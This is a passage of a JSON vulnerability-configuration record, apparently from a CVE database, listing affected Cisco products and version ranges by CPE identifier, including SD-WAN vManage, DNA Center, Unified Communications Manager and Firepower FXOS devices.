"versionEndExcluding": "2.10.0.1",
"versionStartIncluding": "2.10.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.9.1.3",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cloudcenter:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.10.0.16",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cloudcenter_workload_manager:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.5.2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cloudcenter_suite_admin:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.3.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cloudcenter_cost_optimizer:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.5.2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:business_process_automation:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.2.000.009",
"versionStartIncluding": "3.2.000.000",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:business_process_automation:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.1.000.044",
"versionStartIncluding": "3.1.000.000",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:business_process_automation:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.0.000.115",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:automated_subsea_tuning:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.1.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:nexus_insights:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "6.0.2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:advanced_malware_protection_virtual_private_cloud_appliance:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.5.4",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:customer_experience_cloud_agent:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.12.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_security_patch5:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:workload_optimization_manager:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.2.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.0\\(1p\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_director:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "6.8.2.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "20.3.4.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:optical_network_controller:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.1.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:fog_director:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:dna_center:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.4",
"versionStartIncluding": "2.2.3.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "20.4.2.1",
"versionStartIncluding": "20.4",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:integrated_management_controller_supervisor:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.3.2.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "7.3.0.2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:virtualized_infrastructure_manager:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.4.4",
"versionStartIncluding": "3.4.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "20.5.1.1",
"versionStartIncluding": "20.5",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_assurance_engine:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "6.0.2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:virtualized_infrastructure_manager:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.2.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:dna_center:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.1.2.8",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "20.6.2.1",
"versionStartIncluding": "20.6",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:virtual_topology_system:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.6.7",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:dna_center:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.2.8",
"versionStartIncluding": "2.2.2.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:smart_phy:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.2.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:prime_service_catalog:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "12.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_mobile_experiences:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:video_surveillance_operations_manager:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "7.14.4",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unity_connection:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "11.5\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:virtualized_voice_browser:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "12.5\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:cisco:unified_workforce_optimization:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "11.5\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:cisco:unified_sip_proxy:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "10.2.1v2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:cisco:unified_intelligence_center:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "12.6\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "11.6",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:12.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:12.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_enterprise:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "11.6\\(2\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_enterprise:11.6\\(2\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager_im_and_presence_service:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "11.5\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:session_management:*:*:*",
"cpe_name": [],
"versionEndExcluding": "11.5\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:-:*:*:*",
"cpe_name": [],
"versionEndExcluding": "11.5\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\)su3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\):*:*:*:session_management:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\):*:*:*:-:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:paging_server:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "14.4.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:packaged_contact_center_enterprise:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "11.6",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:enterprise_chat_and_email:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "12.0\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:emergency_responder:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "11.5\\(4\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:contact_center_management_portal:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "12.5\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:contact_center_domain_manager:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "12.5\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cloud_connect:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "12.6\\(1\\)",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:broadworks:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2021.11_1.162",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:cisco:fxos:6.2.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:cisco:fxos:6.3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:cisco:fxos:6.4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:cisco:fxos:6.5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:cisco:fxos:6.6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:cisco:fxos:6.7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:cisco:fxos:7.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:cisco:fxos:7.1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_1010:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_1120:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_1140:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_1150:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_2110:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_2120:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_2130:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_2140:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_4110:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_4112:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_4115:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_4120:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_4125:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_4140:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_4145:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_4150:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:cisco:firepower_9300:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:cisco:prime_service_catalog:12.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:6.2.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:6.4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:6.3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:webex_meetings_server:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unity_connection:11.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:6.5.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:firepower_threat_defense:6.6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:20.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:20.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:20.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_enterprise:11.6\\(2\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:cyber_vision_sensor_management_extension:4.0.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:dna_spaces_connector:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_sip_proxy:010.002\\(001\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_sip_proxy:010.002\\(000\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_sip_proxy:010.000\\(001\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_sip_proxy:010.000\\(000\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(2\\):-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(1\\):es02:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(1\\):es01:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(1\\):-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:12.6\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:12.5\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:12.0\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_customer_voice_portal:11.6\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_express:12.5\\(1\\):su1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_express:12.5\\(1\\):-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager_im_\\\u0026_presence_service:11.5\\(1.22900.6\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager_im_\\\u0026_presence_service:11.5\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.22900.28\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.21900.40\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.18900.97\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.18119.2\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.17900.52\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:paging_server:9.1\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:paging_server:9.0\\(2\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:paging_server:9.0\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:paging_server:8.5\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:paging_server:8.4\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:paging_server:8.3\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:paging_server:14.0\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:paging_server:12.5\\(2\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.6\\(2\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.6\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.5\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.0\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:finesse:12.6\\(1\\):es03:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:finesse:12.6\\(1\\):es02:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:finesse:12.6\\(1\\):es01:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:finesse:12.6\\(1\\):-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:finesse:12.5\\(1\\):su2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:finesse:12.5\\(1\\):su1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:enterprise_chat_and_email:12.6\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:enterprise_chat_and_email:12.5\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:enterprise_chat_and_email:12.0\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:emergency_responder:11.5\\(4.66000.14\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:emergency_responder:11.5\\(4.65000.14\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:emergency_responder:11.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_management_portal:12.6\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_express:12.6\\(2\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_contact_center_express:12.6\\(1\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:broadworks:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:unified_computing_system:006.008\\(001.000\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1l\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1k\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1h\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1g\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1f\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1e\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1d\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1c\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1b\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1a\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:ucs_central_software:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:integrated_management_controller_supervisor:2.3.2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:integrated_management_controller_supervisor:002.003\\(002.000\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:20.6.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:20.8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:20.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:sd-wan_vmanage:20.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:optical_network_controller:1.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:network_assurance_engine:6.0\\(2.1912\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:dna_center:2.2.2.8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.2.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.2.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:wan_automation_engine:7.2.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
